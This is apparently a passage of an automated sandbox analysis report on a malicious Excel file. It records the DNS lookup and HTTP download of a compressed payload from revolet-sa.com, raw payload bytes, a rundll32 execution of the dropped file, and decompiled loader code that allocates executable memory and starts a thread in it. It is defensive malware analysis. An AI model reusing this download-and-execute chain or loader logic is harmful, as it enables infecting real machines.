                                      Apr 7, 2021 07:09:59.987624884 CEST4916580192.168.2.22192.232.249.186
                                      Apr 7, 2021 07:09:59.987684965 CEST8049165192.232.249.186192.168.2.22
                                      Apr 7, 2021 07:09:59.987724066 CEST4916580192.168.2.22192.232.249.186
                                      Apr 7, 2021 07:09:59.987731934 CEST8049165192.232.249.186192.168.2.22
                                      Apr 7, 2021 07:09:59.987771988 CEST4916580192.168.2.22192.232.249.186
                                      Apr 7, 2021 07:09:59.987791061 CEST8049165192.232.249.186192.168.2.22
                                      Apr 7, 2021 07:09:59.987819910 CEST8049165192.232.249.186192.168.2.22
                                      Apr 7, 2021 07:09:59.987828970 CEST4916580192.168.2.22192.232.249.186
                                      Apr 7, 2021 07:09:59.987864017 CEST4916580192.168.2.22192.232.249.186
                                      Apr 7, 2021 07:09:59.993496895 CEST4916580192.168.2.22192.232.249.186
                                      Apr 7, 2021 07:09:59.994194031 CEST4916580192.168.2.22192.232.249.186
                                      Apr 7, 2021 07:10:04.809228897 CEST8049165192.232.249.186192.168.2.22
                                      Apr 7, 2021 07:10:04.809417009 CEST4916580192.168.2.22192.232.249.186
                                      Apr 7, 2021 07:10:34.810146093 CEST8049165192.232.249.186192.168.2.22

                                      UDP Packets

                                      TimestampSource PortDest PortSource IPDest IP
                                      Apr 7, 2021 07:09:58.392280102 CEST5219753192.168.2.228.8.8.8
                                      Apr 7, 2021 07:09:58.546928883 CEST53521978.8.8.8192.168.2.22

                                      DNS Queries

                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                      Apr 7, 2021 07:09:58.392280102 CEST192.168.2.228.8.8.80x7e45Standard query (0)revolet-sa.comA (IP address)IN (0x0001)

                                      DNS Answers

                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                      Apr 7, 2021 07:09:58.546928883 CEST8.8.8.8192.168.2.220x7e45No error (0)revolet-sa.com192.232.249.186A (IP address)IN (0x0001)

                                      HTTP Request Dependency Graph

                                      • revolet-sa.com

                                      HTTP Packets

                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      0192.168.2.2249165192.232.249.18680C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                      TimestampkBytes transferredDirectionData
                                      Apr 7, 2021 07:09:58.734183073 CEST0OUTGET /files/countryyelow.php HTTP/1.1
                                      Accept: */*
                                      UA-CPU: AMD64
                                      Accept-Encoding: gzip, deflate
                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                      Host: revolet-sa.com
                                      Connection: Keep-Alive
                                      Apr 7, 2021 07:09:59.150906086 CEST2INHTTP/1.1 200 OK
                                      Date: Wed, 07 Apr 2021 05:09:58 GMT
                                      Server: Apache
                                      Content-Disposition: attachment; filename="3M1Xc.fbx"
                                      Upgrade: h2,h2c
                                      Connection: Upgrade, Keep-Alive
                                      Vary: Accept-Encoding
                                      Content-Encoding: gzip
                                      Keep-Alive: timeout=5, max=75
                                      Transfer-Encoding: chunked
                                      Content-Type: application/octet-stream
                                      Data Raw: 31 66 61 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec 72 7f 60 53 d5 dd f7 49 72 9b 5e da 94 dc 62 a3 55 aa d6 c7 b8 e1 40 45 83 0a 6f c1 55 ed 2d 6c 23 78 af 91 04 84 b6 fa 08 31 de b9 0d 35 17 70 52 2c 0b d5 de 1d e2 d8 86 cf dc 04 05 c5 4d 37 37 9d 43 ed 36 27 a1 ed 5a 3a 19 a2 22 14 01 ad 5a f5 60 a3 06 a9 50 34 70 de ef b9 37 c9 4d 42 da 3d ef df af 85 dc 7b ee f9 7e 3e df 1f 9f ef c7 7b e3 5a 64 43 08 71 f0 a3 14 a1 76 64 fc d5 a2 ff fc 37 0c bf b1 e7 fe 6d 2c da 32 e6 df e7 b5 5b 66 ff fb bc 1b 42 b7 dd 55 bd e4 ce 1f dd 7a e7 cd 3f a8 be e5 e6 1f fe f0 47 e1 ea ff 5e 5c 7d a7 fa c3 ea db 7e 58 5d 77 9d af fa 07 3f 5a b4 f8 e2 b2 b2 12 77 2a c7 c9 eb ba e7 fc ed e2 27 cf 4e ff e2 97 fe fd ec 47 53 e7 07 e1 d7 07 df 4f e9 df 4f 9d 7d db 25 4f 9e 3d ed b2 df 9e bd 09 be af bf f4 b1 b3 cf d3 df 8f 9f 3d 11 de d6 09 7f 3a fb ef fa f7 d3 c6 fb b6 5b 42 2c c7 48 bd 4b 22 42 b3 2d 76 f4 cb ef dd 7e 53 fa ae 1f 8d 3d af 14 ee 50 0b a8 51 6b d7 ef ae 9a 6a 41 48 80 c3 5a a6 10 9c 04 fd a9 eb 85 90 f9 46 bb 4a 0c 1c fc 59 91 01 35 be 85 cc 3d 7b d5 de 5c 84 7c fa 97 1d 71 16 a4 d7 79 52 c8 64 31 ff 6e 2a 41 8b 1a 8d ba 55 ff 8b 5d a4 ff 2a c6 d8 91 c0 8f 1c bf 38 bc 78 79 18 de 57 a8 9c d1 50 0b 97 e9 2f fd 57 0d d5 2f be 73 d1 cd e1 9b 11 fa e5 6b 46 0f 20 4e 5a 83 cc 5f 2d fc bf d8 80 a1 27 57 c3 63 49 91 61 1c f6 ce c5 c5 2e be cd 00 56 5e ca 6e ec 06 ee d9 02 b8 3b ef ba f3 16 96 4f 48 ed a0 1a de 89 53 70 b5 17 df b9 f8 f6 1f 01 f0 e2 c5 48 d7 0a 2d 81 b7 50 92 8f bb 66 64 25 be fe fb fa ef eb bf af ff be fe fb fa ef eb bf af ff be fe fb fa ef eb bf af ff fe ff fa 6b ff 4b 13 27 90 1b ab 2d 48 96 37 ad 59 59 24 44 16 c7 91 5f 13 13 8a 25 2a 26 1a 25 85 57 90 a6 26 c9 be a9 1c c2 5e 1e ee 24 72 d1 56 2b dc c5 5b 16 27 51 d4 9b 20 4f 6d b3 42 68 08 8b 7c e3 22 ad 8c 25 ed ed e0 10 0d bb 39 46 96 c9 df 80 1a e9 12 e0 6e 2e 8e cb 72 54 1c 96 14 bb 62 25 f7 b1 94 22 8f bd c3 1a 3c 92 da 2c 2e c3 83 b0 4c 7e 92 c3 8b 8a 49 49 29 55 6c e4 3a 9d 96 ec ed d4 91 70 23 93 79 85 90 1c b9 20 0f c9 c9 e4 e2 42 c8 22 f2 d5 95 b9 c8 22 99 70 85 90 76 f2 5a 1e d2 2e 93 b7 ae cc 45 9e 94 14 ab 52 4c 7e 07 d7 41 2c 9e ec ed 74 6e ad 73 73 fa a5 4c fe 58 08 cc 93 1f 9f 0a e6 65 d2 92 01 b7 f7 b2 35 fd e5 1c 58 93 5f 99 4e 7e c5 db 10 4e cc d7 d4 84 27 56 93 d0 c4 64 d8 89 77 92 77 7a ac a8 c7 3e 75 2d 27 e0 6e 58 48 66 1b 9d 50 ca 13 93 24 89 aa 55 54 ad a4 6a 05 55 05 aa 3a 42 09 80 92 f5 21 84 1a 3a aa 90 1f 1f 26 15 00 3f 5a e7 e6 2d e1 62 3f 59 00 45 e6 e3 ee 46 28 7f a8 e9 75 2b 6a af 06 78 67 4a 0d 05 31 3d ac 8a 45 26 37 58 6c 4c 92 48 57 a5 a1 4a a8 fa 8e 22 41 41 f0 8f 63 e1 cb 21 1c e9 aa 32 85 4c 53 61 c5 67 e6 53 dd 26 15 c2 5f a2 02 54 1b 50 61 e7 6f a3 3c ea 04 93 0a e1 ad 79 d4 93 8c 0a 35 99 09 1e 87 18 13 5b e7 1a 7a 87 26 99 6c 40 ac 1a 89 0d c6 58 5c 80 3d d9 64 03 e2 da 0c bb fd 08 5b 5b b2 0a d6 26 6f 5a b3 b2 48 88 2c 8e 23 bf 26 26 14 4b 54 4c 34 b2 ac 3c 64 b5 cb 9a 9a 24 0e 36 91 97 87 bc 10 93 48 cf df ad 48 53 e3 2d 8b 93 28 ea 4d 90 6b 5f b6 42 74 08 8b 7c 66 af 50 40 9f 7c 8a 59 1d
                                      Data Ascii: 1faar`SIr^bU@EoU-l#x15pR,M77C6'Z:"Z`P4p7MB={~>{ZdCqvd7m,2[fBUz?G^\}~X]w?Zw*'NGSOO}%O==:[B,HK"B-v~S=PQkjAHZFJY5={\|qyRd1n*AU]*8xyWP/W/skF NZ_-'WcIa.V^n;OHSpH-Pfd%kK'-H7YY$D_%*&%W&^$rV+['Q OmBh|"%9Fn.rTb%"<,.L~II)Ul:p#y B""pvZ.ERL~A,tnssLXe5X_N~N'Vdwwz>u-'nXHfP$UTjU:B!:&?Z-b?YEF(u+jxgJ1=E&7XlLHWJ"AAc!2LSagS&_TPao<y5[z&l@X\=d[[&oZH,#&&KTL4<d$6HHS-(Mk_Bt|fP@|Y
                                      Apr 7, 2021 07:09:59.150963068 CEST3INData Raw: ec f8 4f 6a 2d dc 3b b8 ef 29 88 e5 f7 3e d5 64 03 e2 fe 91 d8 60 c7 ef 17 60 4f 37 d9 80 f8 4e 86 dd 7e ee 4d 30 b9 f5 3f 4d 3e 46 9f 7c 1c b5 66 4f fe ef bf e5 4c fe 9d 7f 8c 38 79 ad 59 7d 8c 4c 5e 39 99 a9 fe 3d 56 7d f5 f8 ff 50 bd 44 af be
                                      Data Ascii: Oj-;)>d``O7N~M0?M>F|fOL8yY}L^9=V}PDdNr%2yL.e%:BxDwSEm2`K&a/c]wm.ZkhE>V&#I2yjL6 JdrB#eR}Dcm'ky^dR!|~!
                                      Apr 7, 2021 07:09:59.151001930 CEST4INData Raw: db 36 6d 6e a2 95 62 a9 5a 6b 26 4b 97 80 e4 b6 d7 b4 b9 c3 d1 8a b1 3f 2d 6e 13 4b 9d 2f 5a b1 9a 88 2c 4e a2 e8 94 fb b0 38 6c 3b 8c 91 6d 5b 4b 73 29 0a bb 71 df c4 06 10 34 3e 68 c3 0d f1 9f 56 d5 ac de 1f 2e 9b 7a ae 3a 86 8a c9 99 2d df 46
                                      Data Ascii: 6mnbZk&K?-nK/Z,N8l;m[Ks)q4>hV.z:-F!H-kjonCJ*EaC\S#;7zm}:uR4S+<C(\$t1!IaQn-cQn1v[bu^-v-yWnGn_pJScn[]n5
                                      Apr 7, 2021 07:09:59.151041031 CEST6INData Raw: cc 5a c4 a5 9f 77 30 4f 91 31 fa 79 80 99 89 9c a8 64 e7 03 cc 45 e4 30 3b 8b 71 fc 8a a4 5b c7 f2 39 a5 92 11 2b 26 a7 eb 9c b8 1e b8 e2 2c 0e 29 cc c0 13 3f 85 ba 3a 81 dc 79 58 07 ef 06 00 4f 0e 55 9a e0 31 67 e9 49 21 24 91 81 cb 40 7b 68 10
                                      Data Ascii: Zw0O1ydE0;q[9+&,)?:yXOU1gI!$@{hcHWh+v[DPB?f*gD<^J,ZL.b9(ylb"sL229wIxE"S-B:nb5%3)K_@J"+Jg3LWN~I'&-K7%
                                      Apr 7, 2021 07:09:59.151087999 CEST7INData Raw: b2 34 f2 4e 13 39 96 8c 31 91 ff 4c 21 43 19 e4 2c 13 e9 24 ef 6c cc 20 1f 4e 23 33 d5 cf 31 91 02 79 de 44 de 91 42 ce cb 20 87 36 65 90 e5 04 9b c8 99 29 e4 a4 4c f5 7f 01 12 50 e3 18 9a dc 6c 22 cf 4e 21 13 4b d3 c8 8d 66 ce d3 c8 95 26 f2 c8
                                      Data Ascii: 4N91L!C,$l N#31yDB 6e)LPl"N!Kf&#r e&P`C2aviw>>fAsm~8,[LZz-,5mq:y-<-.*JE&=e3d<wxd55.XA~^HC!kj"83=QwbvxM
                                      Apr 7, 2021 07:09:59.151196003 CEST9INData Raw: d7 72 42 8f 3d b6 8e 13 70 77 53 63 ba 8b 54 ad 5b 07 29 cd d4 5a 68 d6 8a 6c 5b 28 87 88 0d dc 1e 76 3b 48 a5 64 43 6c c2 36 48 d2 d9 fe 24 eb e0 2c e8 20 12 af f5 07 f0 71 82 3f b7 a2 e8 b2 85 ca 18 bc 93 dc b2 87 d2 a8 f7 00 e9 29 e2 8c 66 bc
                                      Data Ascii: rB=pwScT[)Zhl[(v;HdCl6H$, q?)f]pzwtIyF?<p_8s)gymJ%#f'.;[PT'>b?nBH"+K@gIch%hg=8e- dK!zN6Y)}d3;b9(-EVJK
                                      Apr 7, 2021 07:09:59.151231050 CEST9INData Raw: a7 cd d7 4f 8e c0 86 be 5e 28 c0 5e 92 b3 ca 75 23 b1 61 57 cb 0b b0 c3 39 db f4 67 d8 2c cc 4b c6 33 b4 3c 67 8f 97 9e 34 74 e4 73 41 2b 4c 90 5d 26 8e c2 a0 16 13 54 2c 93 8f 4e 14 04 ad 36 41 bc 4c 3a 0a 83 da 4c d0 18 d8 7f 61 d0 1a 13 54 02
                                      Data Ascii: O^(^u#aW9g,K3<g4tsA+L]&T,N6AL:LaT5A23A\yb$eL/+ueg!3X|4<&dr8ef2y.Y&\&l*VLd`-&s3'7tT"v,C<kO!X %YG:Bq&uTAN 7
                                      Apr 7, 2021 07:09:59.151279926 CEST10INData Raw: 31 66 61 30 0d 0a af 84 de 95 29 58 29 93 ba 2f 73 84 7e be 25 a7 da a5 05 aa 15 10 7a b7 29 34 a4 3c 7c 3c 2d 34 78 53 8e b0 54 62 52 41 92 32 06 4a 5a 64 f2 da f1 54 c9 4a c5 42 61 e0 b3 8e c0 b7 c8 f7 76 70 85 08 56 99 6c cc 23 1c fa 7c 34 82
                                      Data Ascii: 1fa0)X)/s~%z)4<|<-4xSTbRA2JZdTJBavpVl#|4M&?#JdrU\BH&'&*w03IXb+^&L]g*K#pY}e{sVr+l0[5|W/]5ArJG%#'
                                      Apr 7, 2021 07:09:59.151323080 CEST12INData Raw: b8 cd 10 2f 49 cc 45 b1 e8 3e 11 72 19 0b a9 64 29 c5 54 0d 31 55 54 74 18 15 96 43 05 b6 2e 0b 53 e7 45 92 5a d7 54 b6 ae 4a 82 de 4b ad ab 02 39 b7 c2 44 52 a8 c5 6c 08 d4 b8 9f 64 af df b9 55 74 b0 8a 52 54 74 84 56 a7 f2 5a 15 24 93 a6 74 de
                                      Data Ascii: /IE>rd)T1UTtC.SEZTJK9DRldUtRTtVZ$t*A|7/beMwh[(,`krBREO]cGIu9_C*(W2LP)cf: nS`w}7]npd]S7rHTy9|Q$^
                                      Apr 7, 2021 07:09:59.151360989 CEST13INData Raw: f5 1a ce e0 42 37 e4 b4 fb e2 9e 51 da 85 25 fc 6a 4f 6e bb fd af e6 98 39 8f 00 d2 07 f3 08 cf 8c 4a 28 92 c9 e5 79 84 95 b9 84 a8 78 92 81 61 6c c5 2e 13 1e c0 41 2c 9e 34 d5 9f 97 1e 87 57 78 99 90 37 47 19 07 e2 db df cc 2d 56 6e 16 f3 c4 24
                                      Data Ascii: B7Q%jOn9J(yxal.A,4Wx7G-Vn$IR,JLTvff"8!xP3)g4vQZ0"3`> K<X+snR(dh&cqpAl_J}71)|Yo4.OC-l)
                                      Apr 7, 2021 07:09:59.312427998 CEST15INData Raw: 14 09 ce 42 90 bc a7 7e f6 ba 0d 9c d0 53 2f 2d 67 2f fb 00 64 c4 dd e9 62 bd 1d 1c 82 9c a4 02 ce 47 eb dc bc 25 5c ec 27 fc 23 56 34 1f 30 10 6b b7 29 50 fa dd bf 30 bd 04 00 06 34 75 20 95 a3 7e 52 8f 98 84 a1 d1 b1 be f1 b1 d6 98 26 26 c2 b5
                                      Data Ascii: B~S/-g/dbG%\'#V40k)P04u ~R&&Q1_M<!Kg#m[2zblQ@e.@j'$5}l$dM\gE:*+b2,N0M2muU)V[{9]bR kjT39pyml^yM


                                      Code Manipulations

                                      Statistics

                                      CPU Usage

                                      Click to jump to process

                                      Memory Usage

                                      Click to jump to process

                                      High Level Behavior Distribution

                                      Click to dive into process behavior distribution

                                      Behavior

                                      Click to jump to process

                                      System Behavior

                                      General

                                      Start time:07:09:33
                                      Start date:07/04/2021
                                      Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                      Wow64 process (32bit):false
                                      Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                      Imagebase:0x13f470000
                                      File size:27641504 bytes
                                      MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high

                                      General

                                      Start time:07:09:39
                                      Start date:07/04/2021
                                      Path:C:\Windows\System32\rundll32.exe
                                      Wow64 process (32bit):false
                                      Commandline:rundll32 ..\sdbybsd.fds,StartW
                                      Imagebase:0xff5d0000
                                      File size:45568 bytes
                                      MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high

                                      General

                                      Start time:07:09:39
                                      Start date:07/04/2021
                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                      Wow64 process (32bit):true
                                      Commandline:rundll32 ..\sdbybsd.fds,StartW
                                      Imagebase:0xb80000
                                      File size:44544 bytes
                                      MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high

                                      General

                                      Start time:07:09:40
                                      Start date:07/04/2021
                                      Path:C:\Windows\System32\wermgr.exe
                                      Wow64 process (32bit):
                                      Commandline:C:\Windows\system32\wermgr.exe
                                      Imagebase:
                                      File size:50688 bytes
                                      MD5 hash:41DF7355A5A907E2C1D7804EC028965D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:moderate

                                      Disassembly

                                      Code Analysis

                                      Reset < >

                                        Executed Functions

                                        APIs
                                        • LoadLibraryW.KERNEL32(00204054), ref: 00201047
                                        • GetProcAddress.KERNEL32(00000000), ref: 0020104E
                                          • Part of subcall function 00201B30: SetLastError.KERNEL32(0000000D,?,00201070,?,00000040), ref: 00201B3D
                                        • SetLastError.KERNEL32(000000C1), ref: 00201096
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2086413447.0000000000201000.00000020.00000001.sdmp, Offset: 00201000, based on PE: false
                                        Similarity
                                        • API ID: ErrorLast$AddressLibraryLoadProc
                                        • String ID:
                                        • API String ID: 1866314245-0
                                        • Opcode ID: 5ad622204fb91fa88b1d36ea210f19943b025aad1f2beeb4f25c630c3774fc88
                                        • Instruction ID: 8dfbbbaef400200ed9bc57e5be7633a30ef42dd53185c293812aea9699bdae3e
                                        • Opcode Fuzzy Hash: 5ad622204fb91fa88b1d36ea210f19943b025aad1f2beeb4f25c630c3774fc88
                                        • Instruction Fuzzy Hash: 36F1FBB4E10209EFDB04CF94D984AAEB7B5BF48304F208598E905AB392D775EE61DF50
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E003B1000() {
                                        				_Unknown_base(*)()* _v8;
                                        				void* _v12;
                                        				struct tagMSG _v40;
                                        				long _v44;
                                        				struct HWND__* _v48;
                                        				long _v52;
                                        				void* _v56;
                                        				void* _t38;
                                        				void* _t43;
                                        				int _t45;
                                        
                                        				SetTimer(0, 0, 0x25b, 0); // executed
                                        				while(GetMessageW( &_v40, 0, 0, 0) != 0) {
                                        					_v40.message = _v40.message + 1;
                                        					if(_v40.message != 0x114) {
                                        						DispatchMessageW( &_v40);
                                        						continue;
                                        					} else {
                                        					}
                                        					break;
                                        				}
                                        				_v12 = 0;
                                        				_v48 = 0;
                                        				_v52 = 0x5000;
                                        				while(_v52 > 0x1000) {
                                        					_v52 = _v52 - 1;
                                        				}
                                        				_v44 = _v52;
                                        				while(_v44 > 0x40) {
                                        					_v44 = _v44 - 1;
                                        				}
                                        				do {
                                        					_t38 = VirtualAlloc(_v12, 0x43000, _v52, _v44); // executed
                                        					_v8 = _t38;
                                        					if(_v8 == 0) {
                                        						Sleep(0x1f4);
                                        					}
                                        				} while (_v8 == 0);
                                        				_v48 =  &(_v48->i);
                                        				E003B1140(_v48, _v8);
                                        				_t43 = CreateThread(0, 0, _v8, 1, 0, 0); // executed
                                        				_v56 = _t43;
                                        				SetTimer(0, 0, 0x2000, 0); // executed
                                        				while(1) {
                                        					_t45 = GetMessageW( &_v40, 0, 0, 0);
                                        					if(_t45 == 0) {
                                        						break;
                                        					}
                                        					_v40.message = _v40.message + 1;
                                        					if(_v40.message == 0x114) {
                                        						return _t45;
                                        					}
                                        					DispatchMessageW( &_v40);
                                        				}
                                        				return _t45;
                                        			}













                                        0x003b1011
                                        0x003b1017
                                        0x003b1031
                                        0x003b103b
                                        0x003b1043
                                        0x00000000
                                        0x00000000
                                        0x003b103d
                                        0x00000000
                                        0x003b103b
                                        0x003b104b
                                        0x003b1052
                                        0x003b1059
                                        0x003b1060
                                        0x003b106f
                                        0x003b106f
                                        0x003b1077
                                        0x003b107a
                                        0x003b1086
                                        0x003b1086
                                        0x003b108b
                                        0x003b109c
                                        0x003b10a2
                                        0x003b10a9
                                        0x003b10b0
                                        0x003b10b0
                                        0x003b10b6
                                        0x003b10c2
                                        0x003b10cd
                                        0x003b10e0
                                        0x003b10e6
                                        0x003b10f4
                                        0x003b10fa
                                        0x003b1104
                                        0x003b110c
                                        0x00000000
                                        0x00000000
                                        0x003b1114
                                        0x003b111e
                                        0x00000000
                                        0x00000000
                                        0x003b1126
                                        0x003b1126
                                        0x003b1131

                                        APIs
                                        • SetTimer.USER32(00000000,00000000,0000025B,00000000), ref: 003B1011
                                        • GetMessageW.USER32 ref: 003B1021
                                        • DispatchMessageW.USER32(?), ref: 003B1043
                                        • VirtualAlloc.KERNELBASE(00000000,00043000,00001000,00000040), ref: 003B109C
                                        • Sleep.KERNEL32(000001F4), ref: 003B10B0
                                        • CreateThread.KERNELBASE(00000000,00000000,00000000,00000001,00000000,00000000), ref: 003B10E0
                                        • SetTimer.USER32(00000000,00000000,00002000,00000000), ref: 003B10F4
                                        • GetMessageW.USER32 ref: 003B1104
                                        • DispatchMessageW.USER32(?), ref: 003B1126
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2086465533.00000000003B1000.00000020.00000001.sdmp, Offset: 003B0000, based on PE: true
                                        • Associated: 00000004.00000002.2086463009.00000000003B0000.00000004.00000001.sdmp Download File
                                        • Associated: 00000004.00000002.2086481166.00000000003E4000.00000002.00000001.sdmp Download File
                                        Similarity
                                        • API ID: Message$DispatchTimer$AllocCreateSleepThreadVirtual
                                        • String ID: @
                                        • API String ID: 368155642-2766056989
                                        • Opcode ID: 951a479552a4302cacc4ab9eb9c640719ae9216ae33057334376d8175ac8eb61
                                        • Instruction ID: bc1b0ece660de3826958e5949cb496e7de9a88739851fdbfc1d88c521482d827
                                        • Opcode Fuzzy Hash: 951a479552a4302cacc4ab9eb9c640719ae9216ae33057334376d8175ac8eb61
                                        • Instruction Fuzzy Hash: 67412C70E44248EBEB11DFA4DD99BDDB778BB48709F604118F701BA6C0C7B5A940DB64
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • GetProcAddress.KERNEL32(?,?), ref: 008508AD
                                        • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 008509BB
                                        • CreateProcessInternalW.KERNEL32(?,00000000,?,00000000,00000000,00000000,0800000C,00000000,?,?,?), ref: 00850A7A
                                        • Wow64DisableWow64FsRedirection.KERNEL32(?), ref: 00850D2B
                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,?,?), ref: 00850D61
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2086525102.0000000000850000.00000040.00000001.sdmp, Offset: 00850000, based on PE: false
                                        Similarity
                                        • API ID: CreateProcessWow64$AddressDirectoryDisableInternalProcRedirectionSystem
                                        • String ID: L!m>$L!m>
                                        • API String ID: 2693396481-4066150234
                                        • Opcode ID: 27737f5a51567e7004a21a6177ea7566fc209ce910b32352934d263de5cc5923
                                        • Instruction ID: 7bec2e564f83cd6fa94f9dd3fd93015f1ce8adbd426f31cd14f208835da2791d
                                        • Opcode Fuzzy Hash: 27737f5a51567e7004a21a6177ea7566fc209ce910b32352934d263de5cc5923
                                        • Instruction Fuzzy Hash: EDF15E78209345DFDA25CF18C490A6E77E1FB99346F60485AF985CB3A1D772E888CF12
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • SetLastError.KERNEL32(0000007F), ref: 002014DB
                                        • SetLastError.KERNEL32(0000007F), ref: 00201507
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2086413447.0000000000201000.00000020.00000001.sdmp, Offset: 00201000, based on PE: false
                                        Similarity
                                        • API ID: ErrorLast
                                        • String ID:
                                        • API String ID: 1452528299-0
                                        • Opcode ID: a5af36cc6d8abec65671dc0f63f55eafdc258af18c5d0ece741cf0ccbbcca15a
                                        • Instruction ID: fb58fb51dbae8dec0f9962d1d115fad33c337aeed36e677fc1b1c49a662c9761
                                        • Opcode Fuzzy Hash: a5af36cc6d8abec65671dc0f63f55eafdc258af18c5d0ece741cf0ccbbcca15a
                                        • Instruction Fuzzy Hash: DC711A74E10209DFDB04DF94C984AADBBB6FF48304F648199D406AB382D771AEA1CF90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • IsBadHugeReadPtr.KERNEL32(00000000,00000014), ref: 002021F9
                                        • SetLastError.KERNEL32(0000007E), ref: 0020223B
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2086413447.0000000000201000.00000020.00000001.sdmp, Offset: 00201000, based on PE: false
                                        Similarity
                                        • API ID: ErrorHugeLastRead
                                        • String ID:
                                        • API String ID: 3239643929-0
                                        • Opcode ID: 0c009915c190a830fc4e00b6d3ce1d8192896dcc74d9538f39e3f1713a24a2dd
                                        • Instruction ID: 13700810f18ac6a9d1c62c96b6a9627366154cc2f587289caeb2e75204bb6921
                                        • Opcode Fuzzy Hash: 0c009915c190a830fc4e00b6d3ce1d8192896dcc74d9538f39e3f1713a24a2dd
                                        • Instruction Fuzzy Hash: B481AA74A10209DFDB04CF94C894AAEBBB1FF48314F248199E909AB391C774EE95CF90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • GetNativeSystemInfo.KERNEL32(?,?,?,?,00180005), ref: 001800E9
                                        • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,00180005), ref: 00180111
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2086369496.0000000000180000.00000040.00000001.sdmp, Offset: 00180000, based on PE: false
                                        Similarity
                                        • API ID: AllocInfoNativeSystemVirtual
                                        • String ID:
                                        • API String ID: 2032221330-0
                                        • Opcode ID: 460d81c489b0c162692d77f33f70033fe6d40d0b28a700ce4a73fb1871822586
                                        • Instruction ID: 8d91bca4df39129efb5bffc7a7cb2d8efce75d661e64bbfda3ad7433c1724967
                                        • Opcode Fuzzy Hash: 460d81c489b0c162692d77f33f70033fe6d40d0b28a700ce4a73fb1871822586
                                        • Instruction Fuzzy Hash: 40D10171A0470A8FDB55EF69C88472AB3E1FF98318F18452DE8958B241E374EA49CF81
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2086413447.0000000000201000.00000020.00000001.sdmp, Offset: 00201000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: be22836fea99ffa07be20cde81afb7110a8236ffb926806051e40203e972a102
                                        • Instruction ID: 30bef5f9940362264f5c6fcd82e395d1b257f563b2d3cd87c8adb1f1be6dd443
                                        • Opcode Fuzzy Hash: be22836fea99ffa07be20cde81afb7110a8236ffb926806051e40203e972a102
                                        • Instruction Fuzzy Hash: 1A41A574A10209EFDB04DF44C494BAAB7B2FB88314F24C159ED195B396C775EEA2CB80
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • VirtualAlloc.KERNELBASE(00000000,00201A51,00003000,00000004,000000BE,?,00201A51,?), ref: 00201A01
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2086413447.0000000000201000.00000020.00000001.sdmp, Offset: 00201000, based on PE: false
                                        Similarity
                                        • API ID: AllocVirtual
                                        • String ID:
                                        • API String ID: 4275171209-0
                                        • Opcode ID: d63e5741686a43946ef71922ae10357c8b96822703dc6df6db4bb688ce0f5838
                                        • Instruction ID: 4a4eaea04b8c1b84a2f44117c7357cba93b7db5897f5e2ff96de52420e9705b1
                                        • Opcode Fuzzy Hash: d63e5741686a43946ef71922ae10357c8b96822703dc6df6db4bb688ce0f5838
                                        • Instruction Fuzzy Hash: B7D0C9B4685208BBE710CB84DC06F69BBACD704611F004185FE089B280D5B1AE0056A1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • VirtualFree.KERNELBASE(?,?,?), ref: 0020182F
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2086413447.0000000000201000.00000020.00000001.sdmp, Offset: 00201000, based on PE: false
                                        Similarity
                                        • API ID: FreeVirtual
                                        • String ID:
                                        • API String ID: 1263568516-0
                                        • Opcode ID: 15cdf7eb45516af5d31fe34becee48e72a4ce9e325b554c03a271e96c268ad32
                                        • Instruction ID: ca4697d096b583a1c3dd4cd2fa71efbed94f482b6973901761cead29d4136fd5
                                        • Opcode Fuzzy Hash: 15cdf7eb45516af5d31fe34becee48e72a4ce9e325b554c03a271e96c268ad32
                                        • Instruction Fuzzy Hash: 9EC04C7611430CABCB04DF98EC84DAB37ADBB8C610B048508BA1D87201C630F9108BA4
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Non-executed Functions

                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2086369496.0000000000180000.00000040.00000001.sdmp, Offset: 00180000, based on PE: false
                                        Similarity
                                        • API ID:
